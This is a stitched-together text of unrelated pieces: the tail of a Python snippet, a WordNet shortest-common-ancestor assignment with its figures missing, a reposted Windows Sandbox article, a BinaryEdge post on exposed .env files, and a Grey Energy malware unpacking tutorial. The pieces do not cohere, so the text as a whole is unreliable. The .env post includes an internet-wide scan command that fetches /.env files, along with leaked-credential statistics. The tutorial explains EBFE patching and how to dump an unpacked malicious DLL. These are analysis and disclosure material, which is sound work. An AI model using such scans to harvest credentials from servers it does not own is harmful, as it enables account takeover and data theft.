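SYNSETS_SAMPLE = (
    "34,AIDS acquired_immune_deficiency_syndrome,placeholder gloss, with a comma\n"
    "36,AND_circuit AND_gate,a circuit in a computer that fires only when all of its inputs fire\n"
)
HYPERNYMS_SAMPLE = "34,47569,56099\n36,42338\n"

if __name__ == "__main__":
    print(parse_synsets(SYNSETS_SAMPLE)[0])
    print(parse_hypernyms(HYPERNYMS_SAMPLE))
```

Keeping a noun-to-ids dictionary makes noun lookups a hash lookup, which comfortably meets a logarithmic bound.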

The WordNet data type 

Implement an immutable data type WordNet with the following API:

  • The WordNet digraph contains 76066 nodes and 84087 edges. It is very difficult to visualize the entire graph at once, so small subgraphs relevant to the context of each example will be displayed later as required.
  • The sca() and the distance() between two nodes v and w are implemented using bfs (breadth-first search) starting from the two nodes separately and combining the distances computed.

Performance requirements 

  • The data type must use space linear in the input size (size of synsets and hypernyms files).
  • The constructor must take time linearithmic (or better) in the input size.
  • The method isNoun() must run in time logarithmic (or better) in the number of nouns.
  • The methods distance() and sca() must make exactly one call to the length() and ancestor() methods in ShortestCommonAncestor, respectively.

The Shortest Common Ancestor

  • An ancestral path between two vertices v and w in a rooted DAG is a directed path from v to a common ancestor x, together with a directed path from w to the same ancestor x.
  • A shortest ancestral path is an ancestral path of minimum total length.
  • We refer to the common ancestor in a shortest ancestral path as a shortest common ancestor.
  • Note that a shortest common ancestor always exists because the root is an ancestor of every vertex. Note also that an ancestral path is a path, but not a directed path.
  • The following animation shows how the shortest common ancestor node 1 for thenodes 3 and 10  for the following rooted DAG is foundat distance 4 with bfs, along with the ancestral path 3-1-5-9-10. 
  • We generalize the notion of shortest common ancestor to subsets of vertices. A shortest ancestral path of two subsets of vertices A and B is a shortest ancestral path over all pairs of vertices v and w, with v in A and w in B.
  • The figure (digraph25.txt) below shows an example in which, for two subsets, red and blue, we have computed several (but not all) ancestral paths, including the shortest one.

Shortest common ancestor data type

Implement an immutable data type ShortestCommonAncestor with the following API:

Basic performance requirements 

The data type must use space proportional to E + V, where E and V are the number of edges and vertices in the digraph, respectively. All methods and the constructor must take time proportional to EV (or better).
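The BFS-based approach described above can be sketched as follows. This is an illustrative sketch rather than the required implementation: the function names and the dictionary-based adjacency representation are assumptions, and the toy graph contains only the edges of the ancestral path 3-1-5-9-10 from the example, not the full DAG from the animation.

```python
from collections import deque

def bfs_distances(adj, sources):
    """Multi-source BFS along directed edges; returns vertex -> distance."""
    dist = {s: 0 for s in sources}
    queue = deque(dist)
    while queue:
        v = queue.popleft()
        for w in adj.get(v, ()):
            if w not in dist:
                dist[w] = dist[v] + 1
                queue.append(w)
    return dist

def shortest_common_ancestor(adj, subset_a, subset_b):
    """Return (ancestor, length) of a shortest ancestral path, or (None, -1)."""
    dist_a = bfs_distances(adj, subset_a)
    dist_b = bfs_distances(adj, subset_b)
    best, best_len = None, -1
    # Every vertex reached from both sides is a common ancestor;
    # keep the one that minimizes the combined distance.
    for v, da in dist_a.items():
        if v in dist_b:
            total = da + dist_b[v]
            if best is None or total < best_len:
                best, best_len = v, total
    return best, best_len

# Toy rooted DAG: edges point from a vertex towards the root (vertex 1).
adj = {3: [1], 10: [9], 9: [5], 5: [1], 1: []}
print(shortest_common_ancestor(adj, [3], [10]))  # (1, 4)
```

Each call runs two breadth-first searches, so it takes time proportional to E + V, which is within the EV bound stated above. Passing whole subsets as the sources covers the generalization to sets of vertices without extra code.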

Measuring the semantic relatedness of two nouns

Semantic relatedness refers to the degree to which two concepts are related. Measuring semantic relatedness is a challenging problem. For example, let’s consider George W. Bush and John F. Kennedy (two U.S. presidents) to be more closely related than George W. Bush and chimpanzee (two primates). It might not be clear whether George W. Bush and Eric Arthur Blair are more related than two arbitrary people. However, both George W. Bush and Eric Arthur Blair (a.k.a. George Orwell) are famous communicators and, therefore, closely related.

Let’s define the semantic relatedness of two WordNet nouns x and y as follows:

  • A = set of synsets in which x appears
  • B = set of synsets in which y appears
  • distance(x, y) = length of shortest ancestral path of subsets A and B
  • sca(x, y) = a shortest common ancestor of subsets A and B

This is the notion of distance that we need to use to implement the distance() and sca() methods in the WordNet data type.


Finding semantic relatedness for some example nouns with the shortest common ancestor and the distance method implemented

apple and potato (distance 5 in the Wordnet Digraph, as shown below)


As can be seen, the noun entity is the root of the Wordnet DAG.

beer and diaper (distance 13 in the Wordnet Digraph)


beer and milk (distance 4 in the Wordnet Digraph, with SCA as drink synset), as expected since they are semantically closer to each other.


bread and butter (distance 3 in the Wordnet Digraph, as shown below)


cancer and AIDS (distance 6 in the Wordnet Digraph, with SCA as disease as shown below, bfs computed distances and the target distance between the nouns are also shown)


car and vehicle (distance 2 in the Wordnet Digraph, with SCA as vehicle as shown below)


cat and dog (distance 4 in the Wordnet Digraph, with SCA as carnivore as shown below)


cat and milk (distance 7 in the Wordnet Digraph, with SCA as substance as shown below, here cat is identified as Arabian tea)


Einstein and Newton (distance 2 in the Wordnet Digraph, with SCA as physicist as shown below)


Leibnitz and Newton (distance 2 in the Wordnet Digraph, with SCA as mathematician)


Gandhi and Mandela (distance 2 in the Wordnet Digraph, with SCA as national_leader synset)


laptop and internet (distance 11 in the Wordnet Digraph, with SCA as instrumentation synset)

school and office (distance 5 in the Wordnet Digraph, with SCA as construction synset as shown below)


bed and table (distance 3 in the Wordnet Digraph, with SCA as furniture synset as shown below)

Tagore and Einstein (distance 4 in the Wordnet Digraph, with SCA as intellectual synset as shown below)


Tagore and Gandhi (distance 8 in the Wordnet Digraph, with SCA as person synset as shown below)


Tagore and Shelley (distance 2 in the Wordnet Digraph, with SCA as author as shown below)


text and mining (distance 12 in the Wordnet Digraph, with SCA as abstraction synset as shown below)


milk and water (distance 3 in the Wordnet Digraph, with SCA as food, as shown below)

Outcast detection

Given a list of WordNet nouns x_1, x_2, …, x_n, which noun is the least related to the others? To identify an outcast, compute the sum of the distances between each noun and every other one:

d_i   =   distance(x_i, x_1)   +   distance(x_i, x_2)   +   …   +   distance(x_i, x_n)

and return a noun x_t for which d_t is maximum. Note that distance(x_i, x_i) = 0, so it will not contribute to the sum.
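The outcast rule above is a direct sum-and-maximize computation. In the minimal sketch below, the function name outcast and the toy distance table are hypothetical: the table holds made-up values for three placeholder nouns and is not WordNet data. In practice the distance argument would be the WordNet distance() method.

```python
def outcast(nouns, distance):
    """Return a noun whose summed distance to all the nouns is largest."""
    totals = {x: sum(distance(x, y) for y in nouns) for x in nouns}
    return max(nouns, key=lambda x: totals[x])

# Hypothetical symmetric distances between three placeholder nouns.
toy = {
    frozenset(("a", "b")): 1,
    frozenset(("a", "c")): 5,
    frozenset(("b", "c")): 6,
}

def toy_distance(x, y):
    # A noun is at distance 0 from itself, so it adds nothing to the sum.
    return 0 if x == y else toy[frozenset((x, y))]

print(outcast(["a", "b", "c"], toy_distance))  # c
```

Here the totals are 6 for a, 7 for b, and 11 for c, so c is returned.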

Implement an immutable data type Outcast with the following API:




As expected, potato is the outcast in the list of nouns shown below: it has the maximum total distance from the rest of the nouns, all of which are fruits. This can be seen in the WordNet distance heatmap in the next plot, as well as in the sum-of-distances plot that follows it.

Again, as expected, table is the outcast in the list of nouns shown below: it has the maximum total distance from the rest of the nouns, all of which are mammals. This can be seen in the WordNet distance heatmap in the next plot, as well as in the sum-of-distances plot that follows it.


Finally, as expected, bed is the outcast in the list of nouns shown below: it has the maximum total distance from the rest of the nouns, all of which are drinks. This can be seen in the WordNet distance heatmap in the next plot, as well as in the sum-of-distances plot that follows it.


Microsoft unveils Windows Sandbox: Run any app in a disposable virtual machine

( Original text by PETER BRIGHT )

A few months ago, Microsoft let slip a forthcoming Windows 10 feature that was, at the time, called InPrivate Desktop: a lightweight virtual machine for running untrusted applications in an isolated environment. That feature has now been officially announced with a new name, Windows Sandbox.

Windows 10 already uses virtual machines to increase isolation between certain components and protect the operating system. These VMs have been used in a few different ways. Since its initial release, for example, suitably configured systems have used a small virtual machine running alongside the main operating system to host portions of LSASS. LSASS is a critical Windows subsystem that, among other things, knows various secrets, such as password hashes, encryption keys, and Kerberos tickets. Here, the VM is used to protect LSASS from hacking tools such that even if the base operating system is compromised, these critical secrets might be kept safe.

In the other direction, Microsoft added the ability to run Edge tabs within a virtual machine to reduce the risk of compromise when visiting a hostile website. The goal here is the opposite of the LSASS virtual machine—it’s designed to stop anything nasty from breaking out of the virtual machine and contaminating the main operating system, rather than preventing an already contaminated main operating system from breaking into the virtual machine.

Windows Sandbox is similar to the Edge virtual machine but designed for arbitrary applications. Running software in a virtual machine and then integrating that software into the main operating system is not new—VMware has done this on Windows for two decades now—but Windows Sandbox is using a number of techniques to reduce the overhead of the virtual machine while also maximizing the performance of software running within the VM, without compromising the isolation it offers.

The sandbox depends on operating system files residing in the host.

Traditional virtual machines have their own operating system installation stored on a virtual disk image, and that operating system must be updated and maintained separately from the host operating system. The disk image used by Windows Sandbox, by contrast, shares the majority of its files with the host operating system; it contains a small amount of mutable data, the rest being immutable references to host OS files. This means that it’s always running the same version of Windows as the host and that, as the host is updated and patched, the sandbox OS is likewise updated and patched.

Sharing is used for memory, too; operating system executables and libraries loaded within the VM use the same physical memory as those same executables and libraries loaded into the host OS.

That sharing of the host's operating system files even occurs when the files are loaded into memory.

Standard virtual machines running a complete operating system include their own process scheduler that carves up processor time between all the running threads and processes. For regular VMs, this scheduler is opaque; the host just knows that the guest OS is running, and it has no insight into the processes and threads within that guest. The sandbox virtual machine is different; its processes and threads are directly exposed to the host OS’ scheduler, and they are scheduled just like any other threads on the machine. This means that if the sandbox has a low priority thread, it can be displaced by a higher priority thread from the host. The result is that the host is generally more responsive, and the sandbox behaves like a regular application, not a black-box virtual machine.

On top of this, video cards with WDDM 2.5 drivers can offer hardware-accelerated graphics to software running within the sandbox. With older drivers, the sandbox will run with the kind of software-emulated graphics that are typical of virtual machines.

Taken together, Windows Sandbox combines elements of virtual machines and containers. The security boundary between the sandbox and the host operating system is a hardware-enforced boundary, as is the case with virtual machines, and the sandbox has virtualized hardware much like a VM. At the same time, other aspects—such as sharing executables both on-disk and in-memory with the host as well as running an identical operating system version as the host—use technology from Windows Containers.

At least for now, the Sandbox appears to be entirely ephemeral. It gets destroyed and reset whenever it’s closed, so no changes can persist between runs. The Edge virtual machines worked similarly in their first incarnation; in subsequent releases, Microsoft added support for transferring files from the virtual machine to the host so that they could be stored persistently. We’d expect a similar kind of evolution for the Sandbox.

Windows Sandbox will be available in Insider builds of Windows 10 Pro and Enterprise starting with build 18305. At the time of writing, that build hasn’t shipped to insiders, but we expect it to be coming soon.

Publicly accessible .ENV files

( Original text by BinaryEdge )

Deployment is something a lot of companies still struggle with. A few weeks ago, we wrote a blog post about Kubernetes being deployed insecurely and how Kubernetes pods are being hijacked to mine cryptocurrency.

This week we look at something different but still related to deployments: exposing things to the public that should not be exposed.

One tweet from @svblxyz (whom we would also like to thank for all the help given to us on reviewing this post and giving tips on things to add) showed us an interesting Google dork, which made us wonder what this looks like for IP addresses rather than the domains and services that Google search focuses on:

Don’t put your .env files in the web-server directory https://www.google.com/search?q=db_password+filetype%3Aenv … (9:15 PM, Sep 26, 2018)

So we launched a scan using our distributed platform, as simple as:

> curl https://api.binaryedge.io/v1/tasks -d '{
      "description": "HTTP Worldscan .env",
      "type": "scan",
      "options": [{
        "targets": ["XXXX"],
        "ports": [{
            "modules": ["http"],
            "port": "80",
            "config": { "http_path": "/.env" }
        }]
      }]
    }' -H 'X-Token:XXXXXX'

After this we started getting results, and of course multiple issues can be identified in these scans:

  • Bad Deployments — The .ENV files being accessible is something that shouldn’t happen — there are companies exposing this type of file fully readable with no authentication.
  • Weak credentials — Lots of services with a username/password combo using weak passwords.

Credentials and Tokens

Many different types of service tokens were found:

  • AWS — 38 tokens
  • Mangopay — 9 tokens
  • Stripe — 89 tokens
  • Pusher — 1600 Tokens

Other tokens found include:

  • PlugandPlay
  • Paypal
  • Mailchimp
  • Facebook
  • PhantomJS
  • Mailgun
  • Twitter
  • JWT
  • Google
  • WeChat
  • Shopify
  • Nexmo
  • Bitly
  • Braintree
  • Twilio
  • Recaptcha
  • Ucloud
  • Firebase
  • Mandrill
  • Slack
  • Sentry.io
  • Shopzcoin

Many of these systems involve financial records and payments.

But we also found access configurations for databases, which potentially contain customer data, such as:

  • DB_PASSWORD keys: 1161
  • REDIS_PASSWORD keys: 801
  • MySQL credentials: 946 (username/password combos).

Looking at the passwords being used, the top 3 are all weak:

1 — secret — 93
2 — root — 33
3 — adminadmin — 24

Other weak passwords found are:

  • password
  • test123
  • foobar
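A check along these lines can be run against your own .env files before deployment. The sketch below is illustrative only: the function names and the sample file content are hypothetical, the parser handles just simple KEY=VALUE lines, and the weak-password set contains only the values listed above.

```python
# The weak values reported above; a real check would use a larger list.
WEAK_PASSWORDS = {"secret", "root", "adminadmin", "password", "test123", "foobar"}

def parse_env(text):
    """Parse simple KEY=VALUE lines, skipping blanks and # comments."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        # Drop optional surrounding quotes around the value.
        entries[key.strip()] = value.strip().strip("'\"")
    return entries

def weak_password_keys(entries):
    """Return keys that look like passwords and hold a known weak value."""
    return sorted(
        key for key, value in entries.items()
        if "PASSWORD" in key.upper() and value.lower() in WEAK_PASSWORDS
    )

# Hypothetical .env content for illustration.
sample = """
APP_KEY=XXXXXX
DB_PASSWORD=secret
REDIS_PASSWORD="a-long-random-value"
"""
print(weak_password_keys(parse_env(sample)))  # ['DB_PASSWORD']
```

A strong password in an exposed .env file is still a leaked password, so this only complements keeping the file out of the web-server directory.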

When exposed tokens go super bad…


Also very dangerous are situations like CVE-2018-15133, where a leaked APP_KEY for a Laravel app allows an attacker to execute commands on the machine where the Laravel instance is running.

Our scan found 300 APP_KEY tokens related to Laravel.

One important note: our scan looked only at port 80 internet-wide. The real exposure can easily be much higher, as other web apps will surely be exposing more .env files!

Unpacking Grey Energy malware (Service Application DLL)

( Original text by D3xt3r )

Recently I stumbled upon a malware sample that was part of the Grey Energy malware campaign targeting Ukraine’s energy infrastructure. I ran the hash of the file on VirusTotal, and many of the antivirus engines tagged it as Grey Energy. I tried to do a little more internet research but didn’t find any analysis of it, so I decided to write one.
In this post you will learn the following:

  1. How to debug a Windows Service Application DLL
  2. How to use the EBFE debugging technique
  3. How to unpack a DLL binary
  4. How to dump an unpacked in-memory executable

Identifying the Malware

Using some basic static analysis tools, you can tell that it’s a 64-bit Windows DLL.

Since it’s a DLL, we need to look at the export table. Only one function is exported: ServiceMain. This function is usually exported by a Windows Service Application DLL, and it is invoked when a request is made to the Windows Service Application.

Checking the import section, you can see the DLLs below being imported. But as we will see in the further analysis, not all of the imported DLLs are in use.

Brief Introduction To Windows Service Application

If you already know about Windows Services, I would advise you to skip this section. I will describe the necessary details about Windows Services from a malware author’s perspective; if you are interested in knowing more, you can refer to the links in the reference section at the end of this post.

What is a Windows Service?

A Windows Service Application is a long-running background application with no user interface that can start automatically when the system boots or reboots. Services can be put into various states, such as started, stopped, paused, resumed, and restarted, all managed by the Windows Service Control Manager (services.exe). These features make services ideal for malware, which does all its work in the background, runs for a long time, and starts again on reboot. Legitimate use cases for services include web servers and logging machine performance metrics such as CPU and RAM usage. A service executable can be a DLL with a defined entry point.

A service may be written to run either as a stand-alone process or as part of a shared service host process (svchost.exe), which creates a thread per service; the service is allowed to create more threads. If the service runs in a service host, the host creates the thread for the service, loads its DLL, and calls the service entry points to move the service through its states (first start, then eventually stop). Because svchost.exe typically runs under a system account, a thread created inside it gets system privileges, which can be dangerous; however, the DLL can be run in the security context of a specific user account, which can differ from the logged-on user.

Service Application requires the following items:

To create a Service DLL, you need to satisfy the following requirements:

  1. Main entry point: this registers your service by calling StartServiceCtrlDispatcher; it will be the DLL entry point.
  2. Service entry point: this is ServiceMain in the DLL export table. Its tasks are as follows:
    1. Initialize any necessary items that were deferred from the DLL entry point.
      Register the service control handler, which will handle Service Stop, Pause, Continue, Shutdown, and other control commands.
    2. Set the service status to SERVICE_START_PENDING, then to SERVICE_RUNNING. Set the status to SERVICE_STOPPED on any errors and on exit.
    3. Perform startup tasks, such as creating threads, events, mutexes, and IPC channels.
  3. Service Control Handler: the Service Control Handler is registered in your ServiceMain entry point. Each service must have a handler to handle control requests from the SCM. This handler will be called in the context of the SCM and will hold the SCM until it returns. The handler is called on various events, such as start, stop, and pause, with the event passed as a parameter to the handler function.

Basic Static Analysis

We start with static analysis of the DllEntry point, as this is likely the first function to be executed, even before ServiceMain. Below is the disassembly of the DllEntry point.

Looking at the disassembly further, there is some memory allocation and manipulation of that memory. Another interesting function was found at address 0x2c0202bc; it is called after the memory allocation and looks like a decryptor function, or at least preparation for decryption. Below is the disassembly of this function.

There are a couple of XOR operations whose value is picked from rsp+0x68; after some manipulation, the data is written to [rbx+rsi*2], which appears to translate to the same address. We can verify this during dynamic analysis. At this point I am a little suspicious that the executable is packed, as not many functions were recognized by either IDA or radare2 analysis.

Let us have a look at the disassembly of ServiceMain.

These instructions don’t seem to make any sense, which further supports our suspicion of a packed executable. We can use radare2’s entropy calculation to check the entropy of each segment in the executable. If any segment has high entropy, that segment likely holds encrypted data. We can use the radare2 iS entropy command to calculate the entropy of each segment; below is the result of the command.

As you can clearly see, the .text segment has very high entropy compared to the other segments. This confirms our suspicion of a packed executable. In the next sections, we will set up a debugging environment for the Service Application, which is not as straightforward as for other Windows applications, and extract the unpacked executable using dynamic analysis.
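For readers unfamiliar with the entropy measure used above, the following minimal sketch computes Shannon entropy in bits per byte over a byte string. It is not how radare2 implements its check; the function name is hypothetical, and extracting each section's raw bytes from the PE file is assumed to have been done separately.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    # Sum p * log2(1/p) over the byte values that actually occur.
    return sum((n / total) * math.log2(total / n) for n in counts.values())

# A run of identical bytes carries no information, while a buffer in which
# every byte value appears equally often reaches the 8-bit maximum.
low = shannon_entropy(b"\x00" * 1024)
high = shannon_entropy(bytes(range(256)) * 4)
```

Ordinary compiled code usually falls well below the maximum, so a .text section close to 8 bits per byte suggests encrypted or compressed content.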

How to debug a Service Application DLL

If this were a normal DLL, we could just use Immunity Debugger, but a Service Application DLL is different: it has to register itself and declare its state as running within the first few seconds of execution. Also, before the main entry point runs, the Service Control Manager (SCM) must be aware that the service is going to run, and the DLL runs only in the context of the SCM.

So the challenge is that we cannot get hold of the DLL entry point with a debugger. We could overcome this limitation if we could manage to pause execution at the DLL entry point when the SCM runs the DLL.

After doing some research, I came across a technique called EBFE; you can read more about it in the reference section at the end of this post. In this technique, we insert an infinite loop at the point where we want a breakpoint. EB FE is the machine code of a jump instruction that points to itself; once the thread executes it, the thread spins in an infinite loop, and we then have all the time in the world to attach the debugger to the process and start debugging.

The next question is: how do we know which process spawned by the SCM to attach the debugger to? It’s actually very simple: once the CPU executes the infinite loop, that process’s CPU consumption rises to a very high value, something like 90-100%. We can use Process Explorer, one of the Sysinternals tools, to get the process ID.

As you can see in the image above, once the CPU executes the EBFE instruction it goes into an infinite loop, which increases CPU consumption to 95-100%; this is the indicator that our process is ready to be attached to.

Now that we have figured out how to attach the debugger to the Service Application, the next step is to place this instruction at a point that will get executed. There are two points of interest where we can place EBFE: ServiceMain (the service entry point) and DllEntry (the DLL entry point). We will place the EBFE instruction at both of these functions. Before replacing the two bytes, take note of the original two bytes you are replacing. Once the thread hits the infinite loop, we will replace EBFE with the original bytes and continue debugging.
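The patch-and-remember step can be sketched on an in-memory copy of the file. This is only an illustration under stated assumptions: the function names are hypothetical, the file offsets of ServiceMain and DllEntry are assumed to have been worked out already (converting an RVA to a file offset is not shown), and in the real workflow the original bytes are restored in the debugger rather than in the file.

```python
EBFE = b"\xeb\xfe"  # x86/x64 short jump to itself: an infinite loop

def patch_ebfe(image: bytearray, file_offset: int) -> bytes:
    """Overwrite two bytes at file_offset with EB FE; return the original bytes."""
    original = bytes(image[file_offset:file_offset + 2])
    if file_offset < 0 or len(original) != 2:
        raise ValueError("offset is outside the image")
    image[file_offset:file_offset + 2] = EBFE
    return original

def restore(image: bytearray, file_offset: int, original: bytes) -> None:
    """Put the saved bytes back, undoing patch_ebfe."""
    image[file_offset:file_offset + 2] = original

# Demonstration on a small hypothetical buffer instead of a real DLL.
buf = bytearray(b"\x48\x89\x5c\x24\x08")
saved = patch_ebfe(buf, 0)
patched = bytes(buf)
restore(buf, 0, saved)
```

Keeping the saved bytes per offset is what makes it possible to undo the patch once the debugger is attached and the thread is spinning on the loop.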

Dynamically unpacking the packed code

Let us start by analyzing the DllEntry point, since of the two functions only this one contained sensible code.

First, memory is allocated for the size of the original executable. The way it allocates the memory is somewhat unusual: it specifies the base address of the memory block it wants to allocate, and if that fails, it iterates from 100000h in steps of 10000h, trying to allocate the memory at each address. We have to note down this address, as the unpacked executable will be at this address.

Then it changes the memory permissions of the allocated memory and copies each segment (.text, .rdata, ) to the newly allocated memory.

Then it patches the current DLL entry point with the DllEntry function in the unpacked code. Before patching the memory address, it changes the memory permission to writable, then restores it to read and execute.

It then iterates over the Import Address Table (IAT) of the unpacked DLL, loads the DLLs present in the IAT, resolves the imported functions, and patches them into the table.

At this stage the code is unpacked and the IAT is resolved; next, the code jumps to the original DllEntry point for execution.

Dumping the unpacked code

The memory address we noted earlier is the address at which the executable is unpacked, as you can see in the dump below.

We will use the Scylla plugin, which is built into x64dbg, to dump the executable. You have to specify the base address of the executable and the size of the memory you want to use to recover the PE; the size is shown in the debugger’s memory panel next to the address column and is 23000 in our case. Then click Dump PE to save the executable file.

Unpacked Binary

Basic information about the unpacked binary is shown below.

Import section of the unpacked binary

More of the import section, which shows that the binary uses HTTP for communication with the C&C

We can see the service being registered in the ServiceMain function through calls to RegisterServiceCtrlHandlerW and SetServiceStatus, so we can be sure it was indeed a Service Application.


We managed to unpack the Service Application DLL. This packer was specially designed for DLLs, as we observed the unpacking of the binary followed by the patching of the DllEntry point to the original code. No special anti-debug technique was used in the unpacking, which made it fairly trivial and a good learning exercise for a beginner. We also learnt how to dump an in-memory binary along the way.


  1. Creating Windows Service Application in C++
  2. Windows Service Application MSDN
  3. Debugging Remote Thread with EBFE technique